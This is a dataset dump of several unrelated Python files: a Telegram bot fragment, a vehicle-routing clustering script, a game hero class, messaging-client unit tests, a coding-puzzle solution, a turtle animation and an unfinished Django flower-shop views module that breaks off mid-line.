types.InlineKeyboardButton(text='classroom',url='https://classroom.google.com'.format(message.text))\n keyboard.add(url_button,url_button2,url_button3,url_button4)\n \n elif message.text == 'открой мне ютуб':\n bot.send_message(message.chat.id, 'Открываю https://www.youtube.com нажмите на ссылку')\n '''\n\n\n\n\n\nif __name__ == '__main__':\n bot.polling(none_stop=True)\n","sub_path":"telegrambot.py","file_name":"telegrambot.py","file_ext":"py","file_size_in_byte":6718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"384325474","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 4 19:16:21 2017\n\n@author: Jay\n\"\"\"\n\nfrom sklearn.cluster import KMeans\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport math\n\nN = 49\n\ndef parseData(filename):\n nodes = [];\n demands = [];\n typeOfData = \"data\"\n with open(filename) as f:\n for line in f:\n words = line.split(\" \")\n try:\n words.remove('')\n except:\n pass\n try:\n words.remove('\\t')\n except:\n pass\n try:\n words.remove('\\n')\n except:\n pass\n if typeOfData == \"data\":\n if words[0] == \"NAME\":\n name = words[-1].strip()\n if words[0] == \"NODE_COORD_SECTION\" or words[0] == \"NODE_COORD_SECTION\\n\":\n typeOfData = \"nodes\"\n elif typeOfData == \"nodes\":\n if words[0] == \"DEMAND_SECTION\" or words[0] == \"DEMAND_SECTION\\n\":\n typeOfData = \"demands\"\n else:\n nodes.append([float(words[1]),float(words[2])])\n elif typeOfData == \"demands\":\n if words[0] == \"DEPOT_SECTION\" or words[0] == \"DEPOT_SECTION\\n\":\n typeOfData = \"depot\"\n else:\n demands.append(float(words[1]))\n else:\n pass\n return name,nodes,demands\n\ndef createData(CVRPdatafile):\n name,nodes,demands = parseData(CVRPdatafile)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n for i in range(len(nodes)):\n ax.text(nodes[i][0]+1,nodes[i][1]-1,str(i))\n ax.plot(nodes[i][0],nodes[i][1],\"*b\")\n X = np.array(nodes[1:])\n kmeans = KMeans(n_clusters=N, random_state=0).fit(X)\n clusters = []\n \n for nCluster in range(N):\n thisCluster = [];\n for i in range(len(kmeans.labels_)):\n if nCluster == kmeans.labels_[i]:\n thisCluster.append(i+1)\n clusters.append(thisCluster)\n \n clusters.insert(0,[0])\n \n clusterDemands=[];\n \n for cluster in clusters:\n totaldemand = 0;\n for customer in cluster:\n totaldemand += demands[customer]\n clusterDemands.append(totaldemand)\n \n \n strxy = str(nodes)\n strcl = str(clusters)\n strdem = str(clusterDemands)\n \n strxy = strxy.replace(\"[ \",\"[\")\n strxy = strxy.replace(\" \",\",\")\n strxy = strxy.replace(\",,\",\",\")\n strxy = strxy.replace(\"\\n\",\"\")\n \n strcl = strcl.replace(\"[ \",\"[\")\n strcl = strcl.replace(\" \",\",\")\n strcl = strcl.replace(\",,\",\",\")\n strcl = strcl.replace(\"\\n\",\"\")\n \n strdem = strdem.replace(\"[ \",\"[\")\n strdem = strdem.replace(\" \",\",\")\n strdem = strdem.replace(\",,\",\",\")\n strdem = strdem.replace(\"\\n\",\"\")\n \n text_file = open(name + \"-c\" + str(N) + \".dat\", \"w\")\n text_file.write(strxy + \"\\n\")\n text_file.write(strcl)\n text_file.write(\"\\n\")\n text_file.write(strdem)\n \n text_file.close()\n xy = np.array(nodes)\n \n for i in range(len(xy)):\n ax.plot(xy[i,0],xy[i,1],\"*b\")\n ax.text(xy[i,0]+1,xy[i,1]-1,str(i))\n depot = [xy[clusters[0],0],xy[clusters[0],1]]\n ax.add_patch(mpatches.Rectangle((depot[0] - 3, depot[1] -3), 6, 6, fill=False))\n \n for cluster in clusters[1:]:\n if len(cluster) == 1:\n circle1 = plt.Circle((xy[cluster[0],0],xy[cluster[0],1]), 3, fill = False)\n ax.add_artist(circle1)\n if len(cluster) == 2:\n centerX = (xy[cluster[0],0] + xy[cluster[1],0])/2\n centerY = (xy[cluster[0],1] + xy[cluster[1],1])/2\n xDist = np.sqrt((xy[cluster[0],0] - xy[cluster[1],0])**2 + (xy[cluster[0],1] - xy[cluster[1],1])**2)\n yDist = 0.5*(xDist+5)\n angle = math.atan((xy[cluster[0],1] - xy[cluster[1],1])/(xy[cluster[0],0] - xy[cluster[1],0]))\n ellipse1 = mpatches.Ellipse((centerX,centerY), xDist+5, yDist,np.rad2deg(angle),fill = False)\n ax.add_artist(ellipse1)\n if len(cluster) > 2:\n xData = [];\n yData = [];\n for point in cluster:\n xData.append(xy[point,0])\n yData.append(xy[point,1])\n x1 = min(xData); x2 = max(xData);\n y1 = min(yData); y2 = max(yData);\n x0 = (x1+x2)/2; y0 = (y1+y2)/2;\n avg_x = sum(element for element in xData)/len(xData)\n avg_y = sum(element for element in yData)/len(yData)\n \n x_diff = [element - avg_x for element in xData]\n y_diff = [element - avg_y for element in yData]\n # stddev = np.std(data2,axis=0)\n \n x_diff_squared = [element**2 for element in x_diff]\n slope = sum(x * y for x,y in zip(x_diff, y_diff)) / sum(x_diff_squared)\n # slope = (y2-y1)/(x2-x1)\n angle = math.atan(slope)\n xDist = 2*(x2 - x1)/math.cos(angle)\n yDist = 2*(y2 - y1)*math.cos(angle)\n if yDist == 0:\n yDist = 0.5*(xDist+5)\n ellipse1 = mpatches.Ellipse((x0,y0), xDist, yDist,np.rad2deg(angle),fill = False)\n ax.add_artist(ellipse1)\n\ncreateData('P-n50-k10.dat')","sub_path":"data/parse_CVRP_cluster.py","file_name":"parse_CVRP_cluster.py","file_ext":"py","file_size_in_byte":5287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"301780245","text":"__author__ = 'Владимир'\n\nfrom enum import Enum\nimport models.inventory as inventory\nimport models.hit as hit\nfrom random import choice\n\n\nclass HeroAttribute(Enum):\n strength = 1\n agility = 2\n intelligence = 3\n\n\nclass Hero:\n def __init__(\n self,\n base_attribute: HeroAttribute,\n name='',\n base_strength=0,\n base_agility=0,\n base_intelligence=0,\n strength_per_level=0,\n agility_per_level=0,\n intelligence_per_level=0,\n base_damage=(0, 0),\n base_attack_time=1.7\n ):\n self.name = name\n self._level = 1\n\n self._base_attribute = base_attribute\n\n self._strength_per_level = strength_per_level if strength_per_level >= 0 else 0\n self._agility_per_level = agility_per_level if agility_per_level >= 0 else 0\n self._intelligence_per_level = intelligence_per_level if intelligence_per_level >= 0 else 0\n\n self._base_strength = base_strength if base_strength >= 0 else 0\n self._base_agility = base_agility if base_agility >= 0 else 0\n self._base_intelligence = base_intelligence if base_intelligence >= 0 else 0\n\n self._strength = base_strength\n self._agility = base_agility\n self._intelligence = base_intelligence\n\n self._base_damage = base_damage # поставить проверки и ограничения\n self._base_attack_time = base_attack_time if base_attack_time > 0 else 1.7\n self._base_attack_speed = 100\n\n self._inventory = inventory.Inventory()\n\n self._effects = []\n\n self._damage = self._calculate_damage()\n\n @property\n def level(self) -> int:\n return self._level\n\n @level.setter\n def level(self, value: int):\n if value > 25:\n value = 25\n if value < 1:\n value = 1\n if self.level != value:\n self._change_hero_attributes(value - self.level)\n self._level = value\n\n def level_up(self):\n self.level += 1\n\n @property\n def strength_per_level(self) -> float:\n return self._strength_per_level\n\n @strength_per_level.setter\n def strength_per_level(self, value: float):\n if value < 0:\n value = 0\n delta = value * (self.level - 1) - self._strength_per_level * (self.level - 1)\n self._strength_per_level = value\n self._strength += delta\n\n @property\n def agility_per_level(self) -> float:\n return self._agility_per_level\n\n @agility_per_level.setter\n def agility_per_level(self, value: float):\n if value < 0:\n value = 0\n delta = value * (self.level - 1) - self._agility_per_level * (self.level - 1)\n self._agility_per_level = value\n self._agility += delta\n\n @property\n def intelligence_per_level(self) -> float:\n return self._intelligence_per_level\n\n @intelligence_per_level.setter\n def intelligence_per_level(self, value: float):\n if value < 0:\n value = 0\n delta = value * (self.level - 1) - self._intelligence_per_level * (self.level - 1)\n self._intelligence_per_level = value\n self.base_intelligence += delta\n\n @property\n def strength(self) -> float:\n return self._strength\n\n @property\n def agility(self) -> float:\n return self._agility\n\n @property\n def intelligence(self) -> float:\n return self._intelligence\n\n def _change_hero_attributes(self, factor: int):\n old_base_attr = self.base_attribute_value\n self._strength += factor * self.strength_per_level\n self._agility += factor * self.agility_per_level\n self._intelligence += factor * self.intelligence_per_level\n self._delta_damage_by_delta_base_attribute(self.base_attribute, old_base_attr, self.base_attribute_value)\n\n @property\n def base_attribute_value(self):\n return self._attribute_value(self.base_attribute)\n\n def _attribute_value(self, attr: HeroAttribute):\n if self.base_attribute == attr:\n return self.strength\n elif self.base_attribute == attr:\n return self.agility\n else:\n return self.intelligence\n\n @property\n def base_attribute(self) -> HeroAttribute:\n return self._base_attribute\n\n @base_attribute.setter\n def base_attribute(self, value: HeroAttribute):\n self._delta_damage_by_delta_base_attribute(\n self.base_attribute,\n self._attribute_value(self.base_attribute),\n self._attribute_value(value)\n )\n self._base_attribute = value\n\n def _delta_damage_by_delta_base_attribute(self, attr: HeroAttribute, old_value: float, new_value: float):\n if self.base_attribute == attr:\n delta = round(new_value - old_value)\n self._damage = (self._damage[0] + delta, self._damage[1] + delta)\n\n @property\n def base_strength(self) -> float:\n return self._strength\n\n @base_strength.setter\n def base_strength(self, value: float):\n if value < 0:\n value = 0\n self._delta_damage_by_delta_base_attribute(HeroAttribute.strength, self.base_strength, value)\n delta = value - self._base_strength\n self._strength += delta\n self._base_strength = value\n\n @property\n def base_agility(self) -> float:\n return self._agility\n\n @base_agility.setter\n def base_agility(self, value: float):\n if value < 0:\n value = 0\n self._delta_damage_by_delta_base_attribute(HeroAttribute.agility, self.base_agility, value)\n delta = value - self._base_agility\n self._agility += delta\n self._base_agility = value\n\n @property\n def base_intelligence(self) -> float:\n return self._intelligence\n\n @base_intelligence.setter\n def base_intelligence(self, value: float):\n if value < 0:\n value = 0\n self._delta_damage_by_delta_base_attribute(HeroAttribute.intelligence, self.base_intelligence, value)\n delta = value - self._base_intelligence\n self._intelligence += delta\n self._base_intelligence = value\n\n @property\n def base_attack_speed(self) -> int:\n return self._base_attack_speed\n\n @property\n def base_damage(self) -> (int, int):\n return self._base_damage\n\n @base_damage.setter\n def base_damage(self, value: (int, int)):\n delta1, delta2 = value[0] - self.base_damage[0], value[1] - self.base_damage[1]\n self._base_damage = value\n self._damage = (self._damage[0] + delta1, self._damage[1] + delta2)\n\n @property\n def base_attack_time(self) -> float:\n return self._base_attack_time\n\n @base_attack_time.setter\n def base_attack_time(self, value: float):\n if value <= 0:\n value = 1.7\n self._base_attack_time = value\n\n @property\n def damage(self) -> (int, int):\n return self._damage\n\n def _calculate_damage(self):\n delta = self.base_attribute_value\n\n return self._base_damage[0] + delta, self._base_damage[1] + delta\n\n def __repr__(self):\n return 'Hero: {0}\\nStrength{9}: {1} + {2}\\nAgility{10}: {3} + {4}\\nIntelligence{11}: {5} + {6}\\n' \\\n 'Damage: {7} - {8}'\\\n .format(\n self.name,\n self.strength, self.strength_per_level,\n self.agility, self.agility_per_level,\n self.intelligence, self.intelligence_per_level,\n self.damage[0],\n self.damage[1],\n '*' if self.base_attribute == HeroAttribute.strength else '',\n '*' if self.base_attribute == HeroAttribute.agility else '',\n '*' if self.base_attribute == HeroAttribute.intelligence else ''\n )\n\n def attack(self) -> hit.Hit:\n return hit.Hit(choice(range(self.damage[0], self.damage[1])))","sub_path":"models/hero.py","file_name":"hero.py","file_ext":"py","file_size_in_byte":7940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"30449236","text":"import vivialconnect\n\nfrom tests.common import BaseTestCase\nfrom tests.common import HTTMock\nfrom vivialconnect import Message\n\n\nclass MessageTest(BaseTestCase):\n def test_create_message(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message = vivialconnect.Message({\"id\": 6242736})\n message.save()\n self.assertEqual(\"This is message\", message.body)\n\n def test_get_message(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message = vivialconnect.Message.find(6242736)\n\n self.assertEqual(\"This is message\", message.body)\n self.assertEqual(\"received\", message.status)\n self.assertEqual(\"inbound\", message.direction)\n self.assertEqual(\"+12223334444\", message.from_number)\n self.assertEqual(\"+12223335555\", message.to_number)\n self.assertEqual(0, message.num_media)\n\n def test_update_message(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message = vivialconnect.Message.find(6242736)\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message.save()\n\n def test_get_messages(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/messages\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n messages = vivialconnect.Message.find()\n self.assertEqual(2, len(messages))\n\n def test_count_messages(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/count\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n count = vivialconnect.Message.count()\n self.assertEqual(2, count)\n\n def test_create_attachment(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/attachment\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n attachment = vivialconnect.Attachment(6242737)\n attachment.size = 1024\n attachment.content_type = \"image/gif\"\n attachment.file_name = \"what.gif\"\n attachment.key_name = \"abcdee\"\n attachment.save()\n\n def test_get_attachment(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message = vivialconnect.Message.find(6242736)\n\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/attachment\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n attachment = message.attachment(6242737)\n\n self.assertEqual(\"image/gif\", attachment.content_type)\n self.assertEqual(1024, attachment.size)\n self.assertEqual(\"what.gif\", attachment.file_name)\n self.assertEqual(\"abcdee\", attachment.key_name)\n self.assertEqual(6242737, attachment.message_id)\n\n def test_update_attachment(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message = vivialconnect.Message.find(6242736)\n\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/attachment\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n attachment = message.attachment(6242737)\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/attachment\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n attachment.save()\n\n def test_get_attachments(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message = vivialconnect.Message.find(6242736)\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/attachments\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n attachments = message.attachments()\n self.assertEqual(2, len(attachments))\n\n def test_count_attachments(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message = vivialconnect.Message.find(6242736)\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/attachments_count\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n count = message.attachments_count()\n self.assertEqual(2, count)\n\n def test_send_bulk_message(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/send_bulk\"),\n headers={\"Content-Type\": \"application/json\"},\n ):\n message = Message()\n message.from_number = \"+16164320123\"\n message.to_numbers = [\"+16165444547\", \"+16165648990\"]\n message.body = \"Bulk Message Test\"\n bulk_id = message.send_bulk()\n\n self.assertIsNotNone(bulk_id)\n\n def test_raise_error_without_to_numbers_property(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/send_bulk\"),\n headers={\"Content-Type\": \"application/json\"},\n ), self.assertRaises(ValueError):\n message = Message()\n message.from_number = \"+16164320123\"\n message.body = \"Bulk Message Test\"\n message.send_bulk()\n\n def test_get_bulk_messages(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/bulk_messages\"),\n headers={\"Content-Type\": \"application/json\"},\n ):\n bulk_messages = Message.bulk_messages(\n \"ac84229f-86ca-5edb-a37b-df253a94dbcb\"\n )\n self.assertGreater(len(bulk_messages), 0)\n message = bulk_messages[0]\n self.assertEqual(message.body, \"Bulk Message Test\")\n self.assertEqual(message.message_type, \"local_sms\")\n\n def test_get_all_bulks(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/bulks\"),\n headers={\"Content-Type\": \"application/json\"},\n ):\n bulks = Message.bulks()\n self.assertGreater(len(bulks), 0)\n\n sample_bulk = bulks[0]\n\n self.assertEqual(sample_bulk.errors, 0)\n self.assertGreater(sample_bulk.total_messages, 1)\n self.assertGreater(sample_bulk.processed, 1)\n\n def test_send_mms_without_body(self):\n with HTTMock(\n self.response_content,\n body=self.load_fixture(\"message/message_empty_body\"),\n headers={\"Content-type\": \"application/json\"},\n ):\n message = vivialconnect.Message()\n message.from_number = \"+12223334444\"\n message.to_number = \"12223335555\"\n message.media_urls = [\"http://www.sample-pic.com/sample.jpg\"]\n message.save()\n\n self.assertTrue(hasattr(message, \"body\") and message.body == \"\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"tests/test_message.py","file_name":"test_message.py","file_ext":"py","file_size_in_byte":7957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"341984225","text":"# Complete the checkMagazine function below.\ndef checkMagazine(magazine, note):\n m = {}\n n = {}\n\n for word in magazine:\n if word not in m:\n m[word] = 1\n else:\n m[word] += 1\n\n for word in note:\n if word not in n:\n n[word] = 1\n else:\n n[word] += 1\n\n p = True\n for word in n:\n if word in m and m[word] >= n[word]:\n pass\n else:\n p = False\n break\n\n if p:\n return \"Yes\"\n return \"No\"","sub_path":"Hackerrank/interview_preparation/Dictionaries_and_hashmaps/randsom_notes.py","file_name":"randsom_notes.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"176957412","text":"import turtle\nturtle.tracer(False)\nturtle.mode('logo')\nturtle.shape('turtle')\ni = 0\na = -35\ncolors = ['red', 'yellow', 'green', 'blue']# 定义颜色数组\nx = turtle.getcanvas().winfo_width()/2\ny = turtle.getcanvas().winfo_height()/2\n\n\ndef head(color):\n turtle.pu()\n turtle.goto(0, 50)\n turtle.fillcolor(color)\n turtle.begin_fill()\n turtle.pd()\n turtle.seth(-90)\n turtle.circle(80, 360)\n turtle.end_fill()# 定义画脸函数\n\n\n\nj = 7\nflag = True\n\n\ndef mouth():\n global j, flag\n turtle.pu()\n turtle.goto(0, -65)\n turtle.pd()\n turtle.seth(90)\n turtle.circle(40, 20 + j)\n turtle.pu()\n turtle.goto(0, -65)\n turtle.pd()\n turtle.seth(90)\n turtle.circle(40, -20-j)\n if j > 50 or j < 5:\n flag = not flag\n if flag == True:\n j = j + 3\n else:\n j = j - 3\n# 定义画嘴巴函数\n\n\ndef eye(a):\n turtle.pu()\n turtle.goto(-20, 0)\n turtle.pd()\n turtle.fillcolor('white')\n turtle.begin_fill()\n turtle.seth(0)\n turtle.circle(15, 360)\n turtle.end_fill()# 左眼眶\n \n turtle.pu()\n turtle.goto(50, 0)\n turtle.pd()\n turtle.fillcolor('white')\n turtle.begin_fill()\n turtle.seth(0)\n turtle.circle(15, 360)\n turtle.end_fill()# 右眼眶\n \n turtle.pu()\n turtle.goto(a, 0)\n turtle.pd()\n turtle.dot(3)\n turtle.pu()\n turtle.goto(a+70, 0)\n turtle.pd()\n turtle.dot(3)# 左眼珠+右眼珠\n\n\ndef emoji(color, a):\n turtle.clear()\n head(color)\n mouth()\n eye(a)# 定义整体函数\n\n\ndef change(x, y):\n global i\n i += 1\n if i > len(colors) - 1:\n i = 0\n emoji(colors[i], a)\n\n\ndef change_eye(event):\n if event.x-x > -300 and event.x-x< -100:\n emoji(colors[i], -45)\n elif event.x-x > 100 and event.x-x < 300:\n emoji(colors[i], -25)\n else:\n emoji(colors[i], -35)\n turtle.update()\n\nemoji(colors[i], -35)\n\nturtle.update()\nturtle.hideturtle()\nturtle.onscreenclick(change, btn=1)\n# 点击鼠标后调用函数emoji\n\ncv = turtle.getcanvas()\ncv.bind(\"\", change_eye)\n\nturtle.done()","sub_path":"example/test/T22_bianlian.py","file_name":"T22_bianlian.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"301010126","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom itertools import chain\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import reverse\nfrom theApp.forms import *\nfrom theApp.models import *\nfrom django.db import connection\nfrom django.template.defaulttags import register\nimport random\n\ncurrentUser = \"empty\"\ncursor = connection.cursor()\n\n'''\n@register.filter\ndef editLink(link):\n return str(link).replace(\"/product/\",\"theApp/static/uploaded/\") + \".jpg\"\n'''\n\ndef user_logout(request):\n logout(request)\n return HttpResponseRedirect(reverse('theApp:index'))\n\ndef register(request):\n registered = False\n if request.method == 'POST':\n user_form = UserForm(data=request.POST)\n if user_form.is_valid():\n dataDic = user_form.cleaned_data\n print(dataDic)\n myUser.save(dataDic)\n registered = True\n else:\n print(user_form.errors)\n else:\n user_form = UserForm()\n return render(request,'registration.html',\n {'user_form':user_form,\n 'registered':registered})\n\ndef user_login(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n cursor.execute('Select password, id From theApp_myuser WHERE username = %s', [username])\n try:\n tmpTup = cursor.fetchall()[0]\n except:\n return HttpResponse(\"No such account.\")\n tmp = tmpTup[0]\n tmpid = tmpTup[1]\n if(password == tmp):\n print('success')\n global currentUser \n currentUser = tmpid\n return HttpResponseRedirect(reverse('theApp:index'))\n else:\n return HttpResponse(\"Your account was inactive.\")\n '''\n if user:\n if user.is_active:\n login(request,user)\n return HttpResponseRedirect(reverse('theApp:index'))\n else:\n return HttpResponse(\"Your account was inactive.\")\n else:\n print(\"Someone tried to login and failed.\")\n print(\"They used username: {} and password: {}\".format(username,password))\n return HttpResponse(\"Invalid login details given\")\n '''\n else:\n return render(request, 'login.html', {})\n\ndef registerProduct(request):\n registered = False\n if request.method == 'POST':\n flower_form = flowerForm(data=request.POST)\n if flower_form.is_valid():\n dataDic = flower_form.cleaned_data\n print(dataDic)\n fid = Flower.save(dataDic)\n stockDic = {}\n stockDic['flower_id'] = str(fid)\n stockDic['seller_id'] = currentUser\n stockDic['count'] = dataDic['stock_count']\n stockDic['sold'] = '0'\n print(\"CURRENT USER:\", currentUser)\n Stocks.save(stockDic)\n registered = True\n else:\n print(flower_form.errors)\n else:\n flower_form = flowerForm()\n return render(request,'registerProduct.html',\n {'flower_form':flower_form,\n 'registered':registered})\n\ndef easteregg(request):\n registered = False\n if request.method == 'POST':\n gizli_form = gizliForm(data=request.POST)\n if gizli_form.is_valid():\n dataDic = gizli_form.cleaned_data\n print(dataDic)\n Category.save(dataDic)\n registered = True\n else:\n print(gizli_form.errors)\n else:\n gizli_form = gizliForm()\n return render(request,'easteregg.html',\n {'gizli_form':gizli_form,\n 'registered':registered})\n\ndef deleteProduct(request):\n registered = False\n if request.method == 'POST':\n del_form = deletionForm(data=request.POST)\n if del_form.is_valid():\n dataDic = del_form.cleaned_data\n print(dataDic)\n tmp = cursor.execute('Select flower_id From theApp_flower WHERE flower_type = %s', [dataDic['name']]).fetchall()[0][0]\n Flower.delete(dataDic['name'],tmp)\n registered = True\n else:\n print(del_form.errors)\n else:\n del_form = deletionForm()\n return render(request,'deletion.html',\n {'del_form':del_form,\n 'registered':registered})\n\ndef changeProduct(request):\n registered = False\n if request.method == 'POST':\n price_form = updatePriceForm(data=request.POST)\n if price_form.is_valid():\n dataDic = price_form.cleaned_data\n print(dataDic)\n Flower.changePrice(dataDic['flower_type'],dataDic['price'])\n registered = True\n else:\n print(price_form.errors)\n else:\n price_form = updatePriceForm()\n return render(request,'changeProduct.html',\n {'price_form':price_form,\n 'registered':registered})\n\n\n'''\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n user = form.save()\n user.refresh_from_db() # load the profile instance created by the signal\n user.profile.birth_date = form.cleaned_data.get('birth_date')\n user.save()\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=user.username, password=raw_password)\n login(request, user)\n return redirect('home')\n else:\n form = SignUpForm()\n return render(request, 'signup.html', {'form': form})\n'''\ndef index(request):\n global currentUser\n curr = currentUser\n print(curr)\n \n profile_name = cursor.execute('SELECT username, id FROM theApp_myuser WHERE id = %s', [currentUser]).fetchall()[0][0]\n most_sold = Stocks.objects.raw('SELECT * From theApp_stocks ORDER BY sold DESC LIMIT 5')\n print(most_sold)\n #SELECT * FROM table1 WHERE id IN (SELECT MAX(num1+num2) FROM table2) ORDER BY id DESC limit 5\n flowers = Flower.objects.raw('SELECT * From theApp_flower ORDER BY price DESC LIMIT 4')\n # make magic\n # print(request.user.username) \n #random_flowers = random.sample(flowers, 5)\n categories = Category.objects.raw('SELECT * From theApp_category')\n print(categories)\n context = {\"profile_name\": profile_name, \"most_sold\": most_sold, \"flowers\": flowers, \"categories\": categories} # todo\n return render(request, 'index.html', context)\n\ndef seller(request, pk):\n products = cursor.execute('SELECT flower_id_id FROM theApp_products WHERE seller_id_id = %s AND count > 0', [pk]).fetchall()\n seller = pk #?\n categories = cursor.execute('SELECT * From theApp_category').fetchall()\n context = {\"products\": products, \"seller\": seller, \"categories\": categories} # todo\n return render(request, 'seller.html', context)\n\ndef products(request):\n categories = Category.objects.raw('SELECT * From theApp_category')\n flowers = Flower.objects.raw('SELECT * From theApp_flower')\n # make magic\n context = {\"flowers\": flowers, \"categories\": categories}\n return render(request, 'products.html', context)\n\ndef product(request, pk):\n #flower_id = pk.flower_id\n #profile_name = myUser.objects.raw('SELECT username From theApp_myUser WHERE id = %s', currentUser) # from profile user alma bakilacak\n #favorite_flowers = Faw_Flow.objects.raw('SELECT * From theApp_Faw_Flow WHERE id = %s', currentUser) # from profile get favorited\n print(pk)\n flow_id = cursor.execute('Select flower_id From theApp_flower WHERE photo_id = %s', [pk]).fetchall()[0][0]\n flower = cursor.execute('SELECT photo_id, description, flower_type, flower_id, occasion, price From theApp_flower WHERE photo_id = %s', [pk]).fetchall() # specific flower with pk\n ph_id = flower[0][0]\n desc = flower[0][1]\n fType = flower[0][2]\n occ = flower[0][4]\n price = flower[0][5]\n stock = cursor.execute('SELECT count, id FROM theApp_stocks WHERE flower_id_id = %s', [flow_id]).fetchall()[0][0] # get flower stock\n \n context = {\"flower\": flower , \"stock\": stock, \"ph_id\": ph_id, \"desc\": desc, \"fType\": fType, \"occ\": occ, \"price\": price} # todo\n\n return render(request, 'product.html', context)\n\ndef profile(request):\n global currentUser\n userInfo = myUser.objects.raw('SELECT * FROM theApp_myuser WHERE id = %s', currentUser) # get profile\n #userInfoTup = cursor.fetchall()[0]\n orders = Order.objects.raw(\"SELECT id, price, note, date FROM theApp_order WHERE customer_id = %s\", currentUser) # get orders\n #ordersTup = cursor.fetchall()\n favorites = Flower.objects.raw(\"SELECT F.flower_type FROM myApp_flower F WHERE F.flower_id IN (SELECT F.flower_id FROM myApp_faw_flow WHERE id = %s)\", currentUser) # get favorite flowers from fav\n #favTup = cursor.fetchall()\n complaints = Complaint_Report.objects.raw(\"SELECT order_id_id, status, subject FROM myApp_complaint_report WHERE cust_id_id = %s\", currentUser) # get all complaints with user id\n #complaintTup = cursor.fetchall()\n context = {\"temp\": temp}\n return render(request, 'profile.html', context)\n\ndef about(request):\n return render(request, 'about.html')\n\ndef order(request, pks):\n # pks is a list\n stocks = \"todo\" # get stocks of flowers\n chocolate = \"todo\" # get chocolate\n context = {\"temp\": temp}\n return render(request, 'order.html')\n\ndef loginSign(request):\n return render(request, 'login.html')\n\ndef changePassword(requst):\n return render(request, 'changePass.html')\n\ndef forum(request):\n forumTopics = Forum_Topic.objects.raw('SELECT * FROM theApp_forum_Topic') # get from forum topics table\n #forumCategories = \"todo\" # get categories from forum categories\n context = {\"forumTopic\": forumTopics}\n return render(request, 'forum.html', context)\n\ndef postEntry(request, pk):\n postEntry = Forum_Entry.objects.raw('SELECT * FROM theApp_forum_Entry WHERE topic_id = %s' , pk)\n context = {'postEntry': postEntry}\n return render(request, 'postEntry.html',context)\n\ndef forumTopic(request, pk):\n forumTopics = Forum_Topic.objects.raw('SELECT * FROM theApp_forum_Topic WHERE topic_id = %s' , pk) # get from forum topics table\n entries = postEntry = Forum_Entry.objects.raw('SELECT * FROM theApp_forum_Entry WHERE topic_id = %s' , pk)\n context = {'forumTopic': formTopic, 'entries': entries}\n return render(request, 'forumTopic.html', context)\n\ndef createTopic(request):\n forumCategories = \"todo\"\n context = {'forumCategories': forumCategories}\n return render(request, 'createTopic.html', context)\n\n\ndef myOrders(request):\n orders = \"todo\" # Get orders from order delivery\n flower = \"todo\" # get all flowers\n # then select from orders\n # do this \n context = {\"temp\": temp}\n return render(request, 'myOrders.html', context)\n\ndef customerService(request):\n reports = Complaint_Report.objects.raw('SELECT order_id_id, subject, status, cust_id_id FROM Complaint_Report') # get cancer from complaint Report\n username = myUser.objects.raw('SELECT Username FROM theApp_myuser WHERE id IN (SELECT cust_id FROM Complaint_Report') # get username with user id from cancer\n context = {\"temp\": temp}\n return render(request, 'customerService.html', context)\n\ndef customerReport(request, pk):\n #using pk get info\n \n return render(request, 'customerReport.html', 